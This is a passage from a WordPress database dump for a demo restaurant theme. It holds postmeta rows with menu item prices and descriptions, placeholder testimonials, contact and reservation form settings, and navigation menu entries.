:{s:10:\"vc_grid_id\";a:0:{}}'),(34855,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34856,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34857,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34858,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34859,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34860,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34861,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34862,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34863,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34864,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34865,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34866,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34867,3126,'mkdf_show_new_sign_woo_meta','no'),(34868,3126,'slide_template','default'),(34869,3126,'_wpb_vc_js_status','false'),(34870,3127,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34871,3127,'restaurant_menu_item_price','20'),(34872,3127,'restaurant_menu_item_description','Rye, genever, demerara, and green chartreuse'),(34873,3127,'slide_template','default'),(34874,3127,'restaurant_menu_item_label','1'),(34875,3128,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34876,3128,'restaurant_menu_item_price','30$'),(34877,3128,'restaurant_menu_item_description','Scotch, cranberry grenadine, lemon, and gilka kummel'),(34878,3128,'restaurant_menu_item_label','2'),(34879,3128,'slide_template','default'),(34880,3129,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34881,3129,'restaurant_menu_item_price','26$'),(34882,3129,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(34883,3129,'restaurant_menu_item_label','3'),(34884,3129,'slide_template','default'),(34885,3130,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34886,3130,'restaurant_menu_item_price','50$'),(34887,3130,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(34888,3130,'slide_template','default'),(34889,3131,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34890,3131,'restaurant_menu_item_price','15$'),(34891,3131,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(34892,3131,'slide_template','default'),(34893,3132,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34894,3132,'restaurant_menu_item_price','10$'),(34895,3132,'restaurant_menu_item_description','Sweet vermouth, amaro lucano, and saline'),(34896,3132,'slide_template','default'),(34897,3133,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34898,3133,'restaurant_menu_item_price','30$'),(34899,3133,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(34900,3133,'slide_template','default'),(34901,3134,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34902,3134,'restaurant_menu_item_price','35$'),(34903,3134,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(34904,3134,'slide_template','default'),(34905,3135,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34906,3135,'restaurant_menu_item_price','50$'),(34907,3135,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(34908,3135,'slide_template','default'),(34909,3136,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34910,3136,'restaurant_menu_item_price','20$'),(34911,3136,'restaurant_menu_item_description','France (Provence) Cinsault, Grenache France (Provence) Cinsault, Grenache'),(34912,3136,'slide_template','default'),(34913,3137,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34914,3137,'restaurant_menu_item_price','50$'),(34915,3137,'restaurant_menu_item_description','France (Loire) Sauvignon Blanc France (Loire) Sauvignon Blanc'),(34916,3137,'slide_template','default'),(34917,3138,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34918,3138,'restaurant_menu_item_price','70$'),(34919,3138,'restaurant_menu_item_description','Portugal (Douro) Rabigato, Codéga de LarinhoFrance (Provence) Cinsault'),(34920,3138,'slide_template','default'),(34921,3139,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34922,3139,'restaurant_menu_item_price','30$'),(34923,3139,'restaurant_menu_item_description','France (Burgundy) Chardonnay'),(34924,3139,'slide_template','default'),(34925,3140,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34926,3140,'restaurant_menu_item_price','20$'),(34927,3140,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(34928,3140,'slide_template','default'),(34929,3141,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34930,3141,'restaurant_menu_item_price','70$'),(34931,3141,'restaurant_menu_item_description','France (Provence) Cinsault'),(34932,3141,'slide_template','default'),(34933,3142,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34934,3142,'restaurant_menu_item_price','20$'),(34935,3142,'restaurant_menu_item_description','France (Loire)'),(34936,3142,'slide_template','default'),(34937,3143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34938,3143,'restaurant_menu_item_price','80$'),(34939,3143,'restaurant_menu_item_description','Portugal (Douro) Rabigato'),(34940,3143,'slide_template','default'),(34941,3144,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34942,3144,'restaurant_menu_item_price','50$'),(34943,3144,'restaurant_menu_item_description','Ground cumin, avocados, peeled and cubed'),(34944,3144,'slide_template','default'),(34945,3145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34946,3145,'restaurant_menu_item_price','30$'),(34947,3145,'restaurant_menu_item_description','Fresh goat cheese, garlic cloves, minced'),(34948,3145,'slide_template','default'),(34949,3146,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34950,3146,'restaurant_menu_item_price','70$'),(34951,3146,'restaurant_menu_item_description','Garbanzo beans or chickpeas, rinsed and drained'),(34952,3146,'slide_template','default'),(34953,3147,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34954,3147,'restaurant_menu_item_price','50$'),(34955,3147,'restaurant_menu_item_description','Marinated artichoke hearts'),(34956,3147,'slide_template','default'),(34957,3148,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34958,3148,'restaurant_menu_item_price','30$'),(34959,3148,'restaurant_menu_item_description','Spreadable cream cheese, crumbled blue cheese'),(34960,3148,'slide_template','default'),(34961,3149,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34962,3149,'restaurant_menu_item_price','20$'),(34963,3149,'restaurant_menu_item_description','French bread baguette, cooked ham, potato salad'),(34964,3149,'slide_template','default'),(34965,3150,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34966,3150,'restaurant_menu_item_price','10$'),(34967,3150,'restaurant_menu_item_description','Cream cheese, softened, butter, brown sugar'),(34968,3150,'slide_template','default'),(34969,3151,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34970,3151,'restaurant_menu_item_price','30$'),(34971,3151,'restaurant_menu_item_description','Cherry-size fresh mozzarella cheese balls'),(34972,3151,'slide_template','default'),(34973,1346,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34974,1346,'restaurant_menu_item_price','50$'),(34975,1346,'restaurant_menu_item_description','Hummus, Greek olives, feta cheese'),(34976,1346,'slide_template','default'),(34977,3152,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34978,3152,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(34979,3152,'mkdf_testimonial_author','anthony johnston'),(34980,3152,'mkdf_testimonial_author_position','guest'),(34981,3152,'slide_template','default'),(34982,3153,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34983,3153,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(34984,3153,'mkdf_testimonial_author','Ruby Anderson'),(34985,3153,'mkdf_testimonial_author_position','guest'),(34986,3153,'slide_template','default'),(34987,603,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34988,603,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(34989,603,'mkdf_testimonial_author','Isabella Lee'),(34990,603,'mkdf_testimonial_author_position','guest'),(34991,603,'slide_template','default'),(34992,1348,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34993,1348,'restaurant_menu_item_price','8$'),(34994,1348,'restaurant_menu_item_description','Corona, Corona Light, Modelo Light & Modelo Especial'),(34995,1348,'slide_template','default'),(34996,1349,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(34997,1349,'restaurant_menu_item_price','9$'),(34998,1349,'restaurant_menu_item_description','Budweiser or Bud Light. Florida only.'),(34999,1349,'slide_template','default'),(35000,1350,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35001,1350,'restaurant_menu_item_price','120$'),(35002,1350,'restaurant_menu_item_description','Argentina'),(35003,1350,'slide_template','default'),(35004,1351,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35005,1351,'restaurant_menu_item_price','150$'),(35006,1351,'restaurant_menu_item_description','WA'),(35007,1351,'slide_template','default'),(35008,1352,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35009,1352,'restaurant_menu_item_price','170$'),(35010,1352,'restaurant_menu_item_description','Stag\'s Leap Wine Cellars, Napa Valley'),(35011,1352,'slide_template','default'),(35012,1353,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35013,1353,'restaurant_menu_item_price','120$'),(35014,1353,'restaurant_menu_item_description','Cavit, Italy'),(35015,1353,'slide_template','default'),(35016,1354,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35017,1354,'restaurant_menu_item_price','70$'),(35018,1354,'restaurant_menu_item_description','Chateau Ste. Michelle, WA'),(35019,1354,'slide_template','default'),(35020,1355,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35021,1355,'restaurant_menu_item_price','20$'),(35022,1355,'restaurant_menu_item_description','Pusser\'s Rum & orange juice with a touch of pina colada mix.'),(35023,1355,'slide_template','default'),(35024,1356,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35025,1356,'restaurant_menu_item_price','12$'),(35026,1356,'restaurant_menu_item_description','Grey Goose Vodka, fresh squeezed lime juice'),(35027,1356,'slide_template','default'),(35028,1357,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35029,1357,'restaurant_menu_item_price','15$'),(35030,1357,'restaurant_menu_item_description','Fireball Cinnamon Whisky & RumChata.'),(35031,1357,'slide_template','default'),(35032,1358,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35033,1358,'restaurant_menu_item_price','9$'),(35034,1358,'restaurant_menu_item_description','Cruzan Single Barrel Rum, blackberry, banana and berry flavors.'),(35035,1358,'slide_template','default'),(35036,1360,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35037,1360,'restaurant_menu_item_price','7$'),(35038,1360,'restaurant_menu_item_description','The traditional cuban cocktail combination. Refreshing lime and mint leaves. Made with Cruzan Light Rum.'),(35039,1360,'slide_template','default'),(35040,1361,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35041,1361,'restaurant_menu_item_price','8$'),(35042,1361,'restaurant_menu_item_description','Smirnoff Vodka, Sauza Blue Tequila, Myer\'s Platinum, Gin, Blue Curocoo, Sour Mix and Sierra Mist'),(35043,1361,'slide_template','default'),(35044,1362,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35045,1362,'restaurant_menu_item_price','7$'),(35046,1362,'restaurant_menu_item_description','Made with Sauza Blue Tequila, watermelon and margarita mix. Topped with fresh watermelon and limes.'),(35047,1362,'slide_template','default'),(35048,1363,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35049,1363,'restaurant_menu_item_price','5$'),(35050,1363,'restaurant_menu_item_description','Cruzan Rum, Fresh Mint and Sierra Mist.'),(35051,1363,'slide_template','default'),(35052,2904,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35053,2904,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(35054,2904,'mkdf_testimonial_author','anthony johnston'),(35055,2904,'mkdf_testimonial_author_position','guest'),(35056,2904,'slide_template','default'),(35057,2906,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35058,2906,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(35059,2906,'mkdf_testimonial_author','anthony johnston'),(35060,2906,'mkdf_testimonial_author_position','guest'),(35061,2906,'slide_template','default'),(35062,3154,'_form','<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit \"Send\"]'),(35063,3154,'_mail','a:8:{s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(35064,3154,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(35065,3154,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";}'),(35066,3154,'_additional_settings',''),(35067,3154,'_locale','en_US'),(35068,3155,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35069,3155,'_form','<div class=\"mkdf-cf7-rf\">\n<label> Event name:[text* event-name]</label><div class=\"mkdf-cf7-rf-date\">\n<label> Event date:[date* your-date min:2018-08-01 max:2050-12-31 class:required \"2018-08-01\"]</label><label> Start time:[time* time-938 time-format:HH:mm min-hour:00-00 max-hour:24*00 step-hour:1]</label><label> End time:[time* time-624 time-format:HH:mm] </label>\n</div>\n[checkbox checkbox-201 \"I/We have flexible date\"]\n<div class=\"mkdf-cf7-rf-guests\">\n<label> Guests:[text* guests] </label><label> Budget:[text* budget]</label><p>[radio radio-653 class:guests label_first default:1 \"Total\" \"Per person\" ]</p>\n</div>\n<label> Contact name:[text* contact-name] </label>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Company (optional):[text company-name] </label><label>Industry (optional):[text industry-name]</label>\n</div>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Email:[email* your-email] </label><label>Phone:[text* phone-number]</label>\n</div>\n<div class=\"mkdf-cf7-rf-msg\">\n<label> Tell us more about event (optional):\n[textarea your-message] </label>\n</div>\n<div class=\"mkdf-cf7-rf-btn\">\n<div class=\"mkdf-cf7-rf-btn-inner\">\n[submit \"Send Reservation\"]\n</div>\n</div>\n</div>'),(35070,3155,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(35071,3155,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(35072,3155,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";s:16:\"invalid_datetime\";s:31:\"Invalid date and time supplied.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:12:\"invalid_time\";s:22:\"Invalid time supplied.\";}'),(35073,3155,'_additional_settings',''),(35074,3155,'_locale','en_US'),(35075,2905,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35076,2905,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(35077,2905,'mkdf_testimonial_author','Isabella Lee'),(35078,2905,'mkdf_testimonial_author_position','guest'),(35079,2905,'slide_template','default'),(35080,3444,'_menu_item_type','post_type'),(35081,3444,'_menu_item_menu_item_parent','3395'),(35082,3444,'_menu_item_object_id','3040'),(35083,3444,'_menu_item_object','page'),(35084,3444,'_menu_item_target',''),(35085,3444,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35086,3444,'_menu_item_xfn',''),(35087,3444,'_menu_item_url',''),(35088,3444,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35089,3444,'_menu_item_icon','null'),(35090,3445,'_menu_item_type','post_type'),(35091,3445,'_menu_item_menu_item_parent','3398'),(35092,3445,'_menu_item_object_id','3034'),(35093,3445,'_menu_item_object','page'),(35094,3445,'_menu_item_target',''),(35095,3445,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35096,3445,'_menu_item_xfn',''),(35097,3445,'_menu_item_url',''),(35098,3445,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35099,3445,'_menu_item_icon','null'),(35100,3446,'_menu_item_type','post_type'),(35101,3446,'_menu_item_menu_item_parent','3418'),(35102,3446,'_menu_item_object_id','3035'),(35103,3446,'_menu_item_object','page'),(35104,3446,'_menu_item_target',''),(35105,3446,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35106,3446,'_menu_item_xfn',''),(35107,3446,'_menu_item_url',''),(35108,3446,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35109,3446,'_menu_item_icon','null'),(35110,3447,'_menu_item_type','post_type'),(35111,3447,'_menu_item_menu_item_parent','3418'),(35112,3447,'_menu_item_object_id','3037'),(35113,3447,'_menu_item_object','page'),(35114,3447,'_menu_item_target',''),(35115,3447,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35116,3447,'_menu_item_xfn',''),(35117,3447,'_menu_item_url',''),(35118,3447,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35119,3447,'_menu_item_icon','null'),(35120,3448,'_menu_item_type','post_type'),(35121,3448,'_menu_item_menu_item_parent','3418'),(35122,3448,'_menu_item_object_id','3036'),(35123,3448,'_menu_item_object','page'),(35124,3448,'_menu_item_target',''),(35125,3448,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35126,3448,'_menu_item_xfn',''),(35127,3448,'_menu_item_url',''),(35128,3448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35129,3448,'_menu_item_icon','null'),(35130,3449,'_menu_item_type','post_type'),(35131,3449,'_menu_item_menu_item_parent','3427'),(35132,3449,'_menu_item_object_id','3038'),(35133,3449,'_menu_item_object','page'),(35134,3449,'_menu_item_target',''),(35135,3449,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35136,3449,'_menu_item_xfn',''),(35137,3449,'_menu_item_url',''),(35138,3449,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35139,3449,'_menu_item_icon','null'),(35140,3450,'_menu_item_type','post_type'),(35141,3450,'_menu_item_menu_item_parent','3431'),(35142,3450,'_menu_item_object_id','3038'),(35143,3450,'_menu_item_object','page'),(35144,3450,'_menu_item_target',''),(35145,3450,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35146,3450,'_menu_item_xfn',''),(35147,3450,'_menu_item_url',''),(35148,3450,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35149,3450,'_menu_item_icon','null'),(35150,3451,'_menu_item_type','post_type'),(35151,3451,'_menu_item_menu_item_parent','3404'),(35152,3451,'_menu_item_object_id','3034'),(35153,3451,'_menu_item_object','page'),(35154,3451,'_menu_item_target',''),(35155,3451,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35156,3451,'_menu_item_xfn',''),(35157,3451,'_menu_item_url',''),(35158,3451,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35159,3451,'_menu_item_icon','null'),(35160,3452,'_menu_item_type','post_type'),(35161,3452,'_menu_item_menu_item_parent','3421'),(35162,3452,'_menu_item_object_id','3037'),(35163,3452,'_menu_item_object','page'),(35164,3452,'_menu_item_target',''),(35165,3452,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35166,3452,'_menu_item_xfn',''),(35167,3452,'_menu_item_url',''),(35168,3452,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35169,3452,'_menu_item_icon','null'),(35170,3453,'_menu_item_type','post_type'),(35171,3453,'_menu_item_menu_item_parent','3421'),(35172,3453,'_menu_item_object_id','3036'),(35173,3453,'_menu_item_object','page'),(35174,3453,'_menu_item_target',''),(35175,3453,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35176,3453,'_menu_item_xfn',''),(35177,3453,'_menu_item_url',''),(35178,3453,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35179,3453,'_menu_item_icon','null'),(35180,3454,'_menu_item_type','post_type'),(35181,3454,'_menu_item_menu_item_parent','3421'),(35182,3454,'_menu_item_object_id','3035'),(35183,3454,'_menu_item_object','page'),(35184,3454,'_menu_item_target',''),(35185,3454,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35186,3454,'_menu_item_xfn',''),(35187,3454,'_menu_item_url',''),(35188,3454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35189,3454,'_menu_item_icon','null'),(35190,3455,'_menu_item_type','post_type'),(35191,3455,'_menu_item_menu_item_parent','3409'),(35192,3455,'_menu_item_object_id','3034'),(35193,3455,'_menu_item_object','page'),(35194,3455,'_menu_item_target',''),(35195,3455,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35196,3455,'_menu_item_xfn',''),(35197,3455,'_menu_item_url',''),(35198,3455,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35199,3456,'_menu_item_type','post_type'),(35200,3456,'_menu_item_menu_item_parent','3414'),(35201,3456,'_menu_item_object_id','3034'),(35202,3456,'_menu_item_object','page'),(35203,3456,'_menu_item_target',''),(35204,3456,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35205,3456,'_menu_item_xfn',''),(35206,3456,'_menu_item_url',''),(35207,3456,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35208,3457,'_menu_item_type','post_type'),(35209,3457,'_menu_item_menu_item_parent','3395'),(35210,3457,'_menu_item_object_id','3042'),(35211,3457,'_menu_item_object','page'),(35212,3457,'_menu_item_target',''),(35213,3457,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35214,3457,'_menu_item_xfn',''),(35215,3457,'_menu_item_url',''),(35216,3457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35217,3457,'_menu_item_icon','null'),(35218,3458,'_menu_item_type','post_type'),(35219,3458,'_menu_item_menu_item_parent','3395'),(35220,3458,'_menu_item_object_id','3041'),(35221,3458,'_menu_item_object','page'),(35222,3458,'_menu_item_target',''),(35223,3458,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35224,3458,'_menu_item_xfn',''),(35225,3458,'_menu_item_url',''),(35226,3458,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35227,3458,'_menu_item_icon','null'),(35228,3459,'_menu_item_type','post_type'),(35229,3459,'_menu_item_menu_item_parent','3401'),(35230,3459,'_menu_item_object_id','3042'),(35231,3459,'_menu_item_object','page'),(35232,3459,'_menu_item_target',''),(35233,3459,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35234,3459,'_menu_item_xfn',''),(35235,3459,'_menu_item_url',''),(35236,3459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a